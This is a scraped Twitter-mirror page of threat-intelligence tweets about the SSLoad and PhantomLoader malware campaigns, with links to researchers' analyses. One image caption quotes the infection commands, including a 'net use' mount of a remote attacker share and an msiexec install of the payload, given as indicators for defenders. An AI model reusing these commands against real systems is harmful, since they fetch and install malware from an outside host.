Top Tweets for #SSLoad
#ThreatProtection A Recent #PhantomLoader Campaign Delivering #SSLoad. Read more: https://t.co/U5rVoEp2cb #CyberSecurity #Malware
@RussianPanda9xx @anyrun_app check out my latest blog post on #ssload and #PhantomLoader
https://t.co/477MPNCUnB
Did you know #ssload sends a POST request to "<IP>/api/gateway" to register the infected device?
You can leverage @anyrun_app Threat Intelligence tool to hunt for ssload using a simple query: url:"api/gateway"
I investigated and analyzed an undocumented loader, #PhantomLoader, disguised as legitimate software to deliver second-stage malware. Please check it out and let me know your thoughts.
#malware
#ssload
#ThreatIntelligence
🚨 The new malware #PhantomLoader, disguising as 360 Total Security module, is being used to spread #SSLoad
Discover detailed technical analysis of the attack chain and both malware families by @BlueEye46572843 🔍
Read and get IOCs 👇
https://t.co/AYhXXuksQn
🚨 The new malware #PhantomLoader, disguising as 360 Total Security module, is being used to spread #SSLoad
Discover detailed technical analysis of the attack chain and both malware families by @BlueEye46572843 🔍
Read and get IOCs 👇
https://t.co/AYhXXuksQn
#SSLoad is gaining popularity among threat actors. Last seen during the #FROZENSHADOW campaign, the Rust-based loader shows a different delivery method: phishing docx -> embedded XML with encoded JS -> PE -> SSLoad. Report: https://t.co/JF8Yz7kuOf
#malware #sandbox #phishing
#Researchers #Detail #Multistage #Attack #Hijacking #Systems with #SSLoad, #Cobalt #Strike
https://t.co/uX5xF9cFeI
#Researchers #Detail #Multistage #Attack #Hijacking #Systems with #SSLoad, #Cobalt #Strike
https://t.co/uX5xF9c7pa
2024-04-18 (Thursday): #SSLoad infection leads to #CobaltStrike DLL. In this case we saw no follow-up Cobalt Strike C2 traffic. List of indicators available at https://t.co/xfFA8vnHvX
#TimelyThreatIntel #Unit42ThreatIntel #Wireshark #InfectionAnalysis
![Cryptolaemus1's tweet photo. #SSLoad - #TA578 - url > .js > smb > .msi
wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js
net use A: \\krd6.]com@80\share\ /persistent:no
msiexec.exe /I avp.msi
msiexec.exe /V
(1/3) 👇
IOC's
https://t.co/GxaK7SIzwx https://t.co/7rI3tqe2wZ](https://pbs.twimg.com/media/GLZhgLsawAAFWev.jpg)
2024-04-15 (Monday): #ContactForms campaign pushing #SSLoad malware as early as Thursday, 2024-04-11. List of indicators available at https://t.co/MLr80TUH73
#Wirshark #Unit42ThreatIntel #TimelyThreatIntel #InfectionTraffic
Last Seen Hashtags on Sotwe
N700系新幹線みずほ・さくら
Seen from United States
actress cum
Seen from India
somaliwasmo
WOW31
Seen from United States
ชักว่าวใส่กางเกงใน
Seen from Thailand
SharedWife
Seen from Turkey
kichijojo
Seen from United Kingdom
googleサーチコンソール
Seen from Brazil
WOWOW推し
Seen from Brazil
reallifelit
Seen from United States
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.9M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.2M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.6M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.1M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
59.9M followers